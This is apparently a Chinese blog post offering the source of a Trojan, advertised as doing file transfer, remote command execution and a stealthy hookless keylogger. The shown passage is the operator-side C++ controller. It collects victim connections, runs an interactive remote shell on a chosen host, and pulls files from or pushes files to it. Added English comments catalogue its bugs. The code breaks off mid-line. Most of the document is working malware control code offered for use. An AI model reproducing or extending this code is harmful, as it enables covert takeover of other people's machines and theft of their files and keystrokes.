Trojan可以实现三个功能,分别为文件传输,远程执行cmd,键盘记录。其中键盘记录功能没有利用hook函数,有较强的隐蔽性。
现在给出源码:
client:
// client.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <winsock2.h>
#include <cstdio>
#include <wincrypt.h>
#include <cstring>
#include <iostream>
#include <string.h>
#include<vector>
#include<time.h>
#define PORT 2345
#define BUFFER_SIZE 1024
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "crypt32.lib")
using namespace std;
// Operator-side constants. The original note records the author's MAC (40-E2-30-68-43-A9)
// and IP (172.20.10.5); neither array is referenced by any function visible on this page.
unsigned char mac_mine[6] = { 0x40, 0xe2, 0x30, 0x68, 0x43, 0xa9 };
unsigned char ip_mine[16] = {"127.0.0.1" }; // note: the literal here is loopback, not the IP in the note
// Count of tracked connections; live entries are host[1..num] (index 0 is never used).
// Incremented by ClientThread and decremented by RemoveHost with no synchronization between the threads.
int num;
// One accepted connection: the peer address as filled in by accept() and the connected socket.
struct node
{
sockaddr_in addrClient;
SOCKET socketClient;
}host[1024]; // fixed capacity; nothing on this page checks num against it before indexing
// Accept loop run on its own thread: lpParameter is the listening socket. Every accepted
// connection is appended to host[] and num is incremented. The loop never exits, and the
// function has no return statement, so its DWORD result is never produced.
DWORD WINAPI ClientThread(LPVOID lpParameter)
{
int len = sizeof(SOCKADDR); // in/out length argument for accept()
SOCKET socketClient;
sockaddr_in addrClient;
int id = 0; // unused
SOCKET socketSever = (SOCKET)lpParameter;
while (true)
{
// Blocks until a peer connects. The result is not compared with INVALID_SOCKET,
// so a failed accept() is recorded as a host entry like any other.
socketClient = accept(socketSever, (SOCKADDR *)&addrClient, &len);
num++; // no bound check against the 1024-entry array; not synchronized with refresh()/HostClear() on the main thread
host[num].addrClient=addrClient;
host[num].socketClient = socketClient;
}
}
// Drops host[id] by shifting host[id+1..num] down one slot and decrementing num.
// id is expected to be in 1..num. The entry's socket is not closed here; the only
// caller on this page (HostClear) reaches this after a send() on it has already failed.
void RemoveHost(int id)
{
for (int i = id; i < num; i++)
{
host[i] = host[i + 1]; // struct copy; at i == num-1 this reads host[num], the last live entry
}
num--;
}
// Probes every tracked connection by sending a 4-byte zero and removes the entries whose
// send() fails. Iterates from num down to 1 so that a removal (which shifts higher indices
// down) does not disturb the entries still to be visited.
// NOTE(review): the probe bytes reach the peer as protocol data; whether the remote side
// tolerates them is not visible on this page.
void HostClear()
{
for (int i = num; i >=1; i--)
{
int sendbuf = 0;
int Result=send(host[i].socketClient, (char*)&sendbuf, sizeof(int), 0);
if (Result == SOCKET_ERROR) // only a send() that fails outright is treated as a disconnect
{
RemoveHost(i);
}
}
}
// Prunes dead connections, then lists the remaining ones (1-based) with peer IP and port.
void refresh()
{
HostClear();
cout << "受控主机数:" << num << endl;
for (int i = 1; i <= num; i++)
{
// sin_port is printed as stored (network byte order) without ntohs(), so the number shown is the byte-swapped port.
cout << i << ". ip:" << inet_ntoa(host[i].addrClient.sin_addr) << " port:" << host[i].addrClient.sin_port << endl;
}
}
// Reads exactly fixedlen bytes from s into recvbuf, looping over short reads.
// Returns fixedlen on success, the number of bytes received so far (< fixedlen) if the
// peer closes the connection first, or -1 if recv() reports an error (the WSA error code
// is printed). UseCmd and the length read in GetFile ignore this return value.
int recvn(SOCKET s, char * recvbuf, unsigned int fixedlen)
{
int iResult;
int cnt = fixedlen; // bytes still to receive (unsigned-to-int conversion; a fixedlen above INT_MAX goes negative and skips the loop)
while (cnt > 0)
{
iResult = recv(s, recvbuf, cnt, 0);
if (iResult < 0)
{
printf("error: %d\n", WSAGetLastError());
return -1;
}
if (iResult == 0) // peer closed the connection: return what was received so far (less than fixedlen)
return fixedlen - cnt;
recvbuf += iResult;
cnt -= iResult;
}
return fixedlen;
}
// Interactive command channel to host[id]: each line typed by the operator is sent to the
// peer and the peer's reply is printed, until the operator types a line starting with "exit".
// Observations (documented, not changed here):
//  - send() always transmits the full BUFFER_SIZE bytes, not just the typed line;
//  - recvn() waits for exactly sizeof(result) (64 KiB) bytes or for the peer to close, and its
//    return value is ignored, so a shorter reply prints whatever the buffer then holds;
//  - printf(result) uses peer-supplied bytes as the format string, and a reply that fills the
//    whole buffer leaves no terminating NUL. The controller fully trusts its peer here.
void UseCmd(int id)
{
SOCKET s = host[id].socketClient;
char buf[BUFFER_SIZE];
char result[BUFFER_SIZE * 64];
int inputlen; // unused
getchar(); // presumably discards the newline left in stdin by the menu prompt — confirm against the caller
while (1)
{
memset(buf, 0, sizeof(buf));
memset(result, 0, sizeof(result));
cout << "C:\\Socket\\Client>";
cin.getline(buf, sizeof(buf));
send(s, buf, BUFFER_SIZE, 0);
if (buf[0] == 'e'&&buf[1] == 'x'&&buf[2] == 'i'&&buf[3] == 't') // the "exit" line has already been sent to the peer at this point
{
cout << "The End." << endl;
return ;
}
recvn(s, result, sizeof(result));
printf(result); // format string comes straight from the network
}
}
// Requests the file named by the operator from host[id] and writes it to a local file of the
// same name. Wire format as read here: the peer first sends a 4-byte big-endian length
// (converted with ntohl), then that many bytes of content.
// Observations (documented, not changed here):
//  - the CreateFile handle is used without checking it against INVALID_HANDLE_VALUE;
//  - recvn()'s -1 error result is stored in the unsigned recvlen and subtracted from filelen,
//    which wraps, and a 0 result (peer closed) leaves filelen unchanged so the loop never ends;
//  - WriteFile's return value is ignored;
//  - the operator-typed name is used verbatim as the local path.
void GetFile(int id)
{
SOCKET s = host[id].socketClient;
char filename[BUFFER_SIZE];
memset(filename, 0, sizeof(filename));
cout << "输入文件名:";
getchar(); // presumably discards the newline left in stdin by the menu prompt — confirm against the caller
cin.getline(filename, sizeof(filename));
send(s, filename, sizeof(filename), 0); // the whole 1024-byte buffer is sent, zero padding included
TCHAR name[BUFFER_SIZE];
memset(name, 0, sizeof(name));
// Byte-by-byte widening to TCHAR: if TCHAR is wchar_t, each byte becomes one wide character,
// so multi-byte (e.g. GBK/UTF-8) names are not converted correctly.
for (int i = 0; filename[i]; i++)
{
name[i] = filename[i];
}
HANDLE hFile;
DWORD count;
hFile = CreateFile(
name, // file name
GENERIC_WRITE, // write access
0, // no sharing while the handle is open
NULL, // handle not inheritable by child processes
CREATE_ALWAYS, // create the file, overwriting (truncating) one that already exists
FILE_ATTRIBUTE_NORMAL, // ordinary file
NULL
);
unsigned int filelen;
recvn(s, (char *)&filelen, sizeof(unsigned int)); // return value ignored: a short read leaves filelen wholly or partly uninitialized
filelen = ntohl(filelen);
unsigned int recvbuflen = min(filelen, BUFFER_SIZE); // size of the first chunk, never more than one buffer
char recvbuf[BUFFER_SIZE];
while (filelen > 0)
{
cout << filelen << endl; // progress: bytes still expected
memset(recvbuf, 0, sizeof(recvbuf));
unsigned int recvlen=recvn(s, recvbuf, recvbuflen); // see the observations above on the -1 and 0 results
WriteFile(hFile, recvbuf, recvlen, &count, 0);
filelen -= recvlen;
recvbuflen = min(filelen, recvbuflen); // shrink the final chunk to the remaining byte count
}
CloseHandle(hFile);
cout << "文件接收成功!" << endl;
}
void SendFile(int id)
{
SOCKET s = host[id].socketClient;
char filename[BUFFER_SIZE];
memset(filename, 0, sizeof(filename));
cout << "输入文件名:";
getchar();
cin.getline(filename, sizeof(filename));
send(s, filename, BUFFER_SIZE, 0);
TCHAR name[BUFFER_SIZE];
memset(name, 0, sizeof(name));
for (int i = 0; filename[i]; i++)
{
name[i] = filename[i];
}
HANDLE hFile;
hFile = CreateFile(
name,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_A